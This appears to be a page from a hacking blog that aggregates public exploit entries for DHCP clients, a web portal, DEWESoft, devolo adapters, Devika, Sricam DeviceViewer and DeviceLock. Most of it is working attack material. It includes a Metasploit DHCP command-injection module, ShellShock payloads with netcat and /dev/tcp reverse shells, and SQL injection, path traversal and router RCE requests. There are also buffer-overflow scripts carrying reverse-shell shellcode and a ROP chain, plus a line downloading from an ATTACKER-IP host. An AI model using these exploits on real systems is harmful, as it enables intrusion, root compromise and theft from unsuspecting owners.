##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::DHCPServer
def initialize(info = {})
super(update_info(info,
'Name' => 'DHCP Client Command Injection (DynoRoot)',
'Description' => %q{
This module exploits the DynoRoot vulnerability, a flaw in how the
NetworkManager integration script included in the DHCP client in
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
processes DHCP options. A malicious DHCP server, or an attacker on
the local network able to spoof DHCP responses, could use this flaw
to execute arbitrary commands with root privileges on systems using
NetworkManager and configured to obtain network configuration using
the DHCP protocol.
},
'Author' =>
[
'Felix Wilhelm', # Vulnerability discovery
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'References' =>
[
['AKA', 'DynoRoot'],
['CVE', '2018-1111'],
['EDB': '44652'],
['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
['URL', 'https://dynoroot.ninja/'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
],
'Targets' => [ [ 'Automatic Target', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2018'
))
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
end
def exploit
hash = datastore.copy
start_service(hash)
@dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
begin
while @dhcp.thread.alive?
sleep 2
end
ensure
stop_service
end
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863152401
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-07
# Vendor Homepage: https://www.weird-solutions.com
# Software : https://www.weird-solutions.com/download/products/dhcpbbv4_retail_x64.exe
# Tested Version: 4.1.0.1503
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DHCP"
DHCP Broadband 4 DHCP Broadband 4 C:\Program Files\DHCP Broadband 4\dhcpt.exe Auto
# Service info
C:\>sc qc "DHCP Broadband 4"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DHCP Broadband 4
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\DHCP Broadband 4\dhcpt.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : DHCP Broadband 4
DEPENDENCIAS : Nsi
: Afd
: NetBT
: Tcpip
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
#!/usr/bin/python
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
# Date: 2014-09-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1
# Tested on: Debian, Ubuntu, Kali
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
from scapy.all import *
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
victim_assign_ip = "10.0.1.100"
server_ip = "10.0.1.2"
gateway_ip = "10.0.1.2"
subnet_mask = "255.255.255.0"
dns_ip = "8.8.8.8"
spoofed_mac = "00:50:56:c0:00:01"
payload = "() { ignored;}; echo 'moo'"
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
rce = payload_5
def toMAC(strMac):
cmList = strMac.split(":")
hCMList = []
for iter1 in cmList:
hCMList.append(int(iter1, 16))
hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
return hMAC
def detect_dhcp(pkt):
# print 'Process ', ls(pkt)
if DHCP in pkt:
# if DHCP Discover then DHCP Offer
if pkt[DHCP].options[0][1]==1:
clientMAC = pkt[Ether].src
print "DHCP Discover packet detected from " + clientMAC
sendp(
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
IP(src=server_ip,dst="255.255.255.255")/
UDP(sport=67,dport=68)/
BOOTP(
op=2,
yiaddr=victim_assign_ip,
siaddr=server_ip,
giaddr=gateway_ip,
chaddr=toMAC(clientMAC),
xid=pkt[BOOTP].xid,
sname=server_ip
)/
DHCP(options=[('message-type','offer')])/
DHCP(options=[('subnet_mask',subnet_mask)])/
DHCP(options=[('name_server',dns_ip)])/
DHCP(options=[('lease_time',43200)])/
DHCP(options=[('router',gateway_ip)])/
DHCP(options=[('dump_path',rce)])/
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
)
print "DHCP Offer packet sent"
# if DHCP Request than DHCP ACK
if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
clientMAC = pkt[Ether].src
print "DHCP Request packet detected from " + clientMAC
sendp(
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
IP(src=server_ip,dst="255.255.255.255")/
UDP(sport=67,dport=68)/
BOOTP(
op=2,
yiaddr=victim_assign_ip,
siaddr=server_ip,
giaddr=gateway_ip,
chaddr=toMAC(clientMAC),
xid=pkt[BOOTP].xid
)/
DHCP(options=[('message-type','ack')])/
DHCP(options=[('subnet_mask',subnet_mask)])/
DHCP(options=[('lease_time',43200)])/
DHCP(options=[('router',gateway_ip)])/
DHCP(options=[('name_server',dns_ip)])/
DHCP(options=[('dump_path',rce)])/
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
)
print "DHCP Ack packet sent"
def main():
#sniff DHCP requests
sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1")
if __name__ == '__main__':
sys.exit(main())
# # # # #
# Exploit Title: De-Workshop - Auto Workshop Portal 1.0 - SQL Injection
# Dork: N/A
# Date: 11.08.2017
# Vendor Homepage : https://sarutech.com/
# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737
# Demo: https://demo.sarutech.com/deworkshop/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an technician users to inject sql commands....
#
# Vulnerable Source:
# .....................
# $customer = getCustomer($_GET['id']);
# ?>
# ....
# $ddaa = $pdo->query("SELECT * FROM vehicle WHERE customer='".$_GET['id']."' order by id desc");
# .....................
#
# Proof of Concept:
#
# http://localhost/[PATH]/vehicleadd.php?id=[SQL]
# -2'++UNION(SELECT+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129)--+-
#
# http://localhost/[PATH]/customerpage.php?id=[SQL]
#
# http://localhost/[PATH]/fileadd.php?id=[SQL]
#
# http://localhost/[PATH]/email.php?id=[SQL]
#
# Etc...
# # # # #
# # # # #
# Exploit Title: DeWorkshop 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : https://sarutech.com/
# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737
# Demo: https://demo.sarutech.com/deworkshop/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands and upload arbitrary file....
#
# Vulnerable Source:
# .....................
# $eid = $_GET["id"];
# ......
# $folder = "img/users/";
# $extention = strrchr($_FILES['bgimg']['name'], ".");
# $bgimg = $_FILES['bgimg']['name'];
# //$bgimg = $new_name.'.jpg';
# $uploaddir = $folder . $bgimg;
# move_uploaded_file($_FILES['bgimg']['tmp_name'], $uploaddir);
# .....................
#
# Proof of Concept:
#
# Customer profile picture arbitrary file can be uploaded ..
#
# http://localhost/[PATH]/customerupdate.php?id=1
# http://localhost/[PATH]/img/users/[FILE].php
#
#####
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security
Vendor:
=============
www.dewesoft.com
Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe
Vulnerability Type:
===================
Remote Internal Command Access
CVE Reference:
==============
CVE-2018-7756
Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run
a "SETFIREWALL Off" command.
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE
Exploit/POC:
=============
TELNET x.x.x.x 1999
RUN calc.exe
OR
Launch the victims browser and send them to website for a drive-by download etc.
TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe
Then from the TELNET session execute it from Downloads directory.
runexe c:\Users\victim\Downloads\DOOM.exe
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replys, update or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
devolo dLAN 550 duo+ Starter Kit Remote Code Execution
Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)
Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.
Desc: The devolo firmware has what seems to be a 'hidden' services which
can be enabled by authenticated attacker via the the htmlmgr CGI script.
This allows the attacker to start services that are deprecated or discontinued
and achieve remote arbitrary code execution with root privileges.
Tested on: Linux 2.6.31
Vulnerability discovered by Stefan Petrushevski aka sm
@zeroscience
Advisory ID: ZSL-2019-5508
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php
04.10.2017
--
The htmlmgr cgi script that is accessible via web, does not validate or sanitize
the configuration parameters that a user wants to change. This allows an attacker
to change configuration parametersincluding parameters that are not even shown in
the web administration panel.
One service that is possible for an attacker to enable is telnet and remote maintenance
shell service and then proceed to login in with the 'root' user which doesn't have a password.
In order for an attacker to achieve this, he would need to change the following two values:
System.Baptization.Telnetd <- to enable telnet
System.Baptization.shell <- to enable remote maintenance shell
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Baptization.Telnetd=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Baptization.shell=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
Since the configuration is read from a file on boot time, an attacker would also
need to somehow make the device to restart. This can be done by issuing the 'reboot'
command again from the html cgi script: System.Reboot
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Reboot=OLACANYOUREBOOT&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
After the reboot the devolo device will have a telnet service on TCP port 23 opened
and an attacker can now login to the device with user 'root' and no password.
--------
Trying DEVOLO-IP...
Connected to DEVOLO-IP.
Escape character is '^]'.
dlanwireless login: root
# whoami
root
#
--------
The attacker then has complete access over the device. t00t.
devolo dLAN 550 duo+ Starter Kit Cross-Site Request Forgery
Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)
Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.
Desc: The web application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. The
devolo web application uses predictable URL/form actions in a repeatable way.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.31
Vulnerability discovered by Stefan Petrushevski aka sm
@zeroscience
Advisory ID: ZSL-2019-5507
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5507.php
04.10.2017
--
curl -i -s -k -X 'POST' \
-H 'Origin: http://DEVOLO-IP' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Referer: http://DEVOLO-IP/cgi-bin/htmlmgr?_file=%2Fwgl%2Fmain.wgl&_sid=&_style=std&_lang=&_dir=expert&_page=time' \
--data-binary $'%3Asys%3ANTPClient.EnableNTP=on&%3Asys%3ANTPClient.NTPServer=waddup.com&%3Asys%3ANTPClient.GMTOffset=%2B01%3A00&%3Asys%3ANTPClient.AutoDaylightSaving=on&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=expert&_page=time&_idx=&_sid=&_csrf=' \
'http://DEVOLO-IP/cgi-bin/htmlmgr'
Even though there is a '_csrf' parameter that is being submited, it is never checked (nor it contains any value)
# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422
#!/usr/bin/python
import argparse
import requests
def exploit(target_url):
url = f'http://{target_url}/api/get-browser-snapshot'
params = {
'snapshot_path': '../../../../etc/passwd'
}
response = requests.get(url, params=params)
print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
args = parser.parse_args()
exploit(args.target)
# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change
# Date: 2019-09-10
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows 7
#!/usr/bin/python
# Steps to reproduce:
# 1. Generate the payload executing the PoC
# 2. Login in the Sricam DeviceViewer application as any registered user
# 3. Go to System Tools -> Change Password
# 4. Set the old password as the malicious payload, and the new password as whatever you want
# 5. The password will be changed with the new one
# 6. To confirm, restart the application and try to login with the new password
payload = "A" * 5000
try:
bypass = open("bypass.txt","w")
print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass")
print("### Author: Alessandro Magnosi\n")
print("[*] Creating old password file")
bypass.write(payload)
bypass.close()
print("[+] Old password file created\n")
print("[i] When changing password, set the old password to the file contents")
print("[i] Close the program and reopen it")
print("[i] Log in with new password")
except:
print("[!] Error creating the file")
# Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)
# Discovery Date: 25/04/2019
# Exploit Author: Hayden Wright
# Vendor Homepage: www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows XP Pro x64, Windows 7 32bit
# CVE : CVE-2019-11563
#!/usr/bin/python
import struct
#------------------------------------------------------------#
# CVE-2019-11563 #
# #
# Sricam DeviceViewer.exe 'username' field SEH overflow #
# by Hayden Wright #
# #
# (*) badchars = '\x00\x0a\x0d' #
# (*) SEH = 0x6a413969 OFFSET 268 #
# (*) nSEH = 268 -4 #
# #
# 69901d06 5E POP ESI #
# 69901d07 5F POP EDI #
# 69901d08 C3 RETN #
# #
#------------------------------------------------------------#
#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh
shellcode =(
"\xb8\x51\x9c\x1c\xa4\xda\xc9\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x42\x12\x83\xea\xfc\x03\x13\x92\xfe\x51\x6f\x42\x7c"
"\x99\x8f\x93\xe1\x13\x6a\xa2\x21\x47\xff\x95\x91\x03\xad\x19"
"\x59\x41\x45\xa9\x2f\x4e\x6a\x1a\x85\xa8\x45\x9b\xb6\x89\xc4"
"\x1f\xc5\xdd\x26\x21\x06\x10\x27\x66\x7b\xd9\x75\x3f\xf7\x4c"
"\x69\x34\x4d\x4d\x02\x06\x43\xd5\xf7\xdf\x62\xf4\xa6\x54\x3d"
"\xd6\x49\xb8\x35\x5f\x51\xdd\x70\x29\xea\x15\x0e\xa8\x3a\x64"
"\xef\x07\x03\x48\x02\x59\x44\x6f\xfd\x2c\xbc\x93\x80\x36\x7b"
"\xe9\x5e\xb2\x9f\x49\x14\x64\x7b\x6b\xf9\xf3\x08\x67\xb6\x70"
"\x56\x64\x49\x54\xed\x90\xc2\x5b\x21\x11\x90\x7f\xe5\x79\x42"
"\xe1\xbc\x27\x25\x1e\xde\x87\x9a\xba\x95\x2a\xce\xb6\xf4\x22"
"\x23\xfb\x06\xb3\x2b\x8c\x75\x81\xf4\x26\x11\xa9\x7d\xe1\xe6"
"\xce\x57\x55\x78\x31\x58\xa6\x51\xf6\x0c\xf6\xc9\xdf\x2c\x9d"
"\x09\xdf\xf8\x32\x59\x4f\x53\xf3\x09\x2f\x03\x9b\x43\xa0\x7c"
"\xbb\x6c\x6a\x15\x56\x97\xfd\xda\x0f\x96\x98\xb2\x4d\x98\x66"
"\x91\xdb\x7e\x0c\x05\x8a\x29\xb9\xbc\x97\xa1\x58\x40\x02\xcc"
"\x5b\xca\xa1\x31\x15\x3b\xcf\x21\xc2\xcb\x9a\x1b\x45\xd3\x30"
"\x33\x09\x46\xdf\xc3\x44\x7b\x48\x94\x01\x4d\x81\x70\xbc\xf4"
"\x3b\x66\x3d\x60\x03\x22\x9a\x51\x8a\xab\x6f\xed\xa8\xbb\xa9"
"\xee\xf4\xef\x65\xb9\xa2\x59\xc0\x13\x05\x33\x9a\xc8\xcf\xd3"
"\x5b\x23\xd0\xa5\x63\x6e\xa6\x49\xd5\xc7\xff\x76\xda\x8f\xf7"
"\x0f\x06\x30\xf7\xda\x82\x4e\x09\xd6\x1e\xc6\xb0\x83\x62\x8a"
"\x42\x7e\xa0\xb3\xc0\x8a\x59\x40\xd8\xff\x5c\x0c\x5e\xec\x2c"
"\x1d\x0b\x12\x82\x1e\x1e")
max_size = 4000
buf = 'A'*264
buf += '\xeb\x06\x90\x90' #jump short 6-bytes
buf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET avformat-54.dll
buf += '\x90' * 16
buf += shellcode
buf += 'C'*(max_size - len(buf))
print '[+] %s bytes buffer created...' %len(buf)
try:
filename = 'CVE-2019-11563.txt'
file = open(filename , 'w')
file.write(buf)
print '[+] Evil buffer saved to file: ' + filename
print '[+] Copy + paste its contents into the "user" field and hit login'
file.close()
except:
print "[!] Could not create file!"
# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1
# Steps to reproduce:
# 1. Get the WinExec address from arwin.exe kernel32.dll WinExec
# 2. Change the related address in the PoC
# 3. Generate the payload using the PoC
# 4. Log in the Sricam DeviceViewer application
# 5. Go to System Configuration -> User Management
# 6. Put the content of the generated file in User Info -> Username
# 7. Click on Add
# 8. A command shell will appear
#!/usr/bin/python
from struct import pack, unpack
def create_rop_chain():
rops = [
0x6a1142aa, # XOR EDX,EDX # RETN
0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0x6ae9c126, # &Writable location [avutil-50.dll]
0x6a5dac8a, # POP EAX # RETN
0xff9b929d, # NEG "cmd\0"
0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll]
0x6994766b, # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a18e062, # ADD ESP, 10 # RETN ---> ESI
0x6a2420ea, # ROP NOP ---> EDI
0x6a45e446, # XCHG EAX,EDX # RETN [avcodec-54.dll]
0x6a29d716, # XCHG EAX,ECX # RETN [avcodec-54.dll]
## ECX = ascii "cmd\0"
0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0x6a36264a, # CALL EBX
## EDX = CALL EBX
0x6a5dac8a, # POP EAX # RETN
0x76e33231, # ptr to WinExec() [kernel32.dll]
#### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication
0x6a150411, # XCHG EAX,EBX # RETN [avcodec-54.dll]
## EBX = &WinExec
0x6a5dac8a, # POP EAX # RETN
0xffffffff, # -0x00000001-> ebx
0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll]
## EAX = 1
0x6a5eb992, # PUSHAD # RETN [avcodec-54.dll]
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
]
return ''.join(pack('<I', _) for _ in rops)
def nops(length):
return "\x90" * length
rop_chain = create_rop_chain()
maxlen = 5000
# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} : # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)
# Don't care nseh
nseh = nops(4)
payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec) # More junk to reach 5000
print("Exploit Length: " + str(len(payload)))
try:
fname = "exprop.txt"
exploit = open(fname,"w")
print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
print("Author: Alessandro Magnosi\n")
print("[*] Creating evil username")
exploit.write(payload)
exploit.close()
print("[+] Username file created\n")
print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
print("[+] A command shell will open")
except:
print("[!] Error creating the file")
# Exploit Title: DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://www.devicelock.com/freeware.html/
# Version: 5.72
# CVE : CVE-2018-10655
# Security Issue:
DeviceLock Plug and Play Auditor "DLPnpAuditor.exe" is vulnerable to a Unicode type of buffer overflow, when supplied a specially crafted textfile using the "scan network" from file option.
The buffer overload payload will get converted to unicode character encoding. Unicode support is used by applications for internationalization purposes allowing a consistent way to visually
represent different character sets on most systems around the world.
e.g.
Before our buffer overflow payload was put on the stack it was expanded with 0x00 so "RRRR" transforms to Unicode representation of "00520052"
(52 is HEX for Ascii char R) containing 0's (NULL) values. Therefore, attempting to exploit the vulnerable program needs an unicode compatiable address
(address with null bytes) and using encoding methods like "alpha2" encoder tool.
Stack dump:
SEH chain of main thread
Address SE handler
0018EE00 ntdll.771B34DD
0018FBD4 00520052
00520052 A42F0000
E5C1411F *** CORRUPT ENTRY ***
EAX 00000000
ECX 00520052
EDX 771B34DD ntdll.771B34DD
EBX 00000000
ESP 0018EDEC
EBP 0018EE0C
ESI 00000000
EDI 00000000
EIP 00520052
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
# Exploit/POC:
1) Create POC textfile
2) Under File menu "Scan Network" choose "From file" under drop down menu.
3) Choose the exploit file select the Scan "Domain" box and run it.
#Unicode SEH Buffer Overflow
#https://www.devicelock.com/download/
PAYLOAD="A"*1036+"R"*8+"B"*56 #Control SEH
file=open("devicelock-bof.txt","w")
file.write(PAYLOAD)
file.close()
print 'DeviceLock Plug and Play Auditor v5.72 (freeware)'
print 'Exploit POC file created.'
print 'hyp3rlinx'
# Disclosure Timeline:
Vendor Notification: April 17, 2018
No reply
Vendor Notification: April 22, 2018
No reply
May 6, 2018 : Public Disclosure
#Exploit Title: Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-04
#Tested Version: 8.10.00.8925
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: Device_Monitoring_Studio_8.10.00.8925.py
#2.- Open code.txt and copy content to clipboard
#3.- Open Device Monitoring Studio
#4.- Select "Tools" > "Connect to New Server"
#5.- Select "Enter the name server or address" and Paste Clipboard
#6.- Select "Ok"
#7.- Crashed
cod = "\x41" * 1000
f = open('code.txt', 'w')
f.write(cod)
f.close()
# Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
# Date: 02-12-22
# Exploit Author: 0xEF
# Vendor Homepage: https://www.audiocodes.com
# Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637
# Version: <= 7.8.20002.47752
# Tested on: Windows 10 & Windows Server 2019
# Default credentials: admin/admin
# SQL injection + Path traversal + Remote Command Execution
